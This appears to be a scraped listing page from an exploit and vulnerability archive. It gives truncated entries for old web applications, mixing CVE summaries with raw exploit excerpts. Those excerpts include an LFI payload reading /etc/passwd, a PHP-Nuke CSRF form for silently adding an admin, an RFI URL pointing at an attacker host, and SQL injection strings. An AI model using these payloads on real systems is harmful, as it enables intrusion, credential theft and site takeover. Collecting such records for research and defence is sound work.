skalinks-csrf.txt

| | | | | | | | | | | || | | | | | | | | |/ |/ | |/ / | ' \ / | | || ' / | |/ |/ \ | | | | | | | Super Editor document.addadmin.submit...

dmguest-lfi.txt

DM Guestbook = 0.4.1 Multiple Local File Include Vulnerabilities http://sourceforge.net/project/showfiles.php?groupid=101364 /guestbook.0.4.1/ POC : /guestbook.php?lng=../../../../../../../etc/passwd%00 /admin/admin.guestbook.php?lng=../../../../../../../etc/passwd%00...

CVE-2007-4862

CVE-2007-4862 is a documented XSS vulnerability affecting SAXON 5.4 in admin/menu.php via config[news_url]. Exploitation requires register_globals On and magic_quotes_gpc Off; the NVD/NVD-derived reports list a Medium impact (I/P) and network access with no confidentiality or availability impact,...

emagiC CMS.Net 4.0 (emc.asp) Remote SQL Injection Vulnerability

No description provided by source. -------------------- emagiC CMS.Net v4.0 Remote SQL Injection Exploit -------------------- + Found : hak3r-b0y + Gr33tz : darko , V4 CrackerS , hackeralQassam , Ans , Barra, all ans-hacker.com members + Script URL : http://www.emagic-cms.com/ + D0rk :...

emagiC CMS.Net 4.0 - emc.asp SQL Injection

emagiC CMS.Net 4.0 - emc.asp SQL Injection -------------------- emagiC CMS.Net v4.0 Remote SQL Injection Exploit -------------------- + Found : hak3r-b0y + Gr33tz : darko , V4 CrackerS , hackeralQassam , Ans , Barra, all ans-hacker.com members + Script URL : http://www.emagic-cms.com/ + D0rk :...

Vanilla 1.1.3 - Blind SQL Injection

Vanilla 1.1.3 - Blind SQL Injection = 4.1, magicquotesgpc=Off Tested on versions 1.1.3, 1.1.2, 1.0.1 echo "------------------------------------------------------------\n"; echo "Vanilla - use specific prefix default LUM\n"; echo "-id= - use specific user id default 1\n"; echo "-c= - benchmark's...

CVE-2002-2290

CVE-2002-2290 affects Mambo Site Server 4.0.11, where a default username/password of admin enables remote attackers to gain privileges. The description across sources repeats that a default credential leads to privilege escalation, but no concrete exploit vectors or patched versions are provided ...

CVE-2002-2304

CVE-2002-2304 concerns a SQL injection vulnerability in MyPHPLinks (versions 2.1.9 and 2.2.0) affecting the admin/auth/checksession.php component. The vulnerability allows remote attackers to manipulate the idsession parameter to execute arbitrary SQL commands. Public records indicate an overall ...

CVE-2004-2730

CVE-2004-2730 describes a local privilege escalation in Sysinternals PsTools: an improper disconnection from remote IPC$ and ADMIN$ shares allows local users to access these shares with elevated privileges by reusing existing mappings. The connected Kaspersky entry (KLA10264) confirms a local-exp...

Design/Logic Flaw

Multiple PHP remote file inclusion vulnerabilities in FrontAccounting FA 1.12 allow remote attackers to execute arbitrary PHP code via a URL in the pathtoroot parameter to 1 access/logout.php or certain PHP scripts under 2 admin/, 3 dimensions/, 4 gl/, 5 inventory/, 6 manufacturing/, 7 purchasing...

CVE-2007-5139

PHP remote file inclusion vulnerability in admin/include/header.php in chupix 0.2.3, when registerglobals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the repertoire parameter...

CVE-2007-5139

CVE-2007-5139 affects chupix 0.2.3 and relates to a PHP remote file inclusion in admin/include/header.php when register_globals is enabled. The vulnerability allows an attacker to execute arbitrary PHP code by supplying a URL in the repertoire parameter. Root cause is the unsafe handling of user-...

CVE-2007-5127

Multiple cross-site scripting XSS vulnerabilities in SimpGB 1.46.02 allow remote attackers to inject arbitrary web script or HTML via 1 the lusername parameter to the default URI under admin/ or 2 the lemoticonlist parameter to admin/emoticonlist.php...

CVE-2007-5127

CVE-2007-5127 describes multiple XSS vulnerabilities in SimpGB 1.46.02 . The issues allow remote attackers to inject arbitrary JavaScript/HTML via two parameters: (1) l_username in the default admin/ URI and (2) l_emoticonlist in admin/emoticonlist.php. The root cause is unsanitized/unvalidated i...

CVE-2007-5091

Multiple cross-site scripting XSS vulnerabilities in eGroupWare 1.4.001 allow remote attackers to inject arbitrary web script or HTML via the catdatacolor parameter to 1 preferences/inc/class.uicategories.inc.php and 2 admin/inc/class.uicategories.inc.php...

CVE-2007-4874

Multiple cross-site scripting XSS vulnerabilities in SimpNews 2.41.03 allow remote attackers to inject arbitrary web script or HTML via the 1 lusername parameter to admin/layout2b.php, and the 2 backurl parameter to comment.php...

PHP-Nuke add admin ALL Versions

Paste this code into an HTML page then link it to victim victim must be admin iframe name="aiuto" frameborder="0" height="0" width="0"/iframe FORM name="Faiuto" ACTION="http://VICTIMURL/nuke/admin.php" target="aiuto" METHOD=POST input type=hidden NAME="addname" value="ATTACKER" input type=hidden...

phpnuke-admin.txt

Paste this code into an HTML page then link it to victim victim must be admin document.Faiuto.submit You are admin now ; Then you can log in into phpnuke with user HACKER and pass YOURPASSWORD...

Joomla! Component joom12pic 1.0 - Remote File Inclusion

Joom!12Pic Component RFI Bug in : /administrator/components/comjoom12pic/admin.joom12pic.php?mosConfiglivesite= Variable : $mosConfiglivesite Dork: "comjoom12pic" Example: http://xxx.net/administrator/components/comjoom12pic/admin.joom12pic.php?mosConfiglivesite=attacker Greets to all...

Omnistar Article Manager Software - 'article.php' SQL Injection

/bin/bash Omnistar Article Manager Software article.php Remote SQL Injection Exploit Exploit Coded By : Cold z3ro http://Hackteach.org Exploit : /article.php?op=favorite&articleid=4&pageid=-1'//union//select//name,1//from//user/...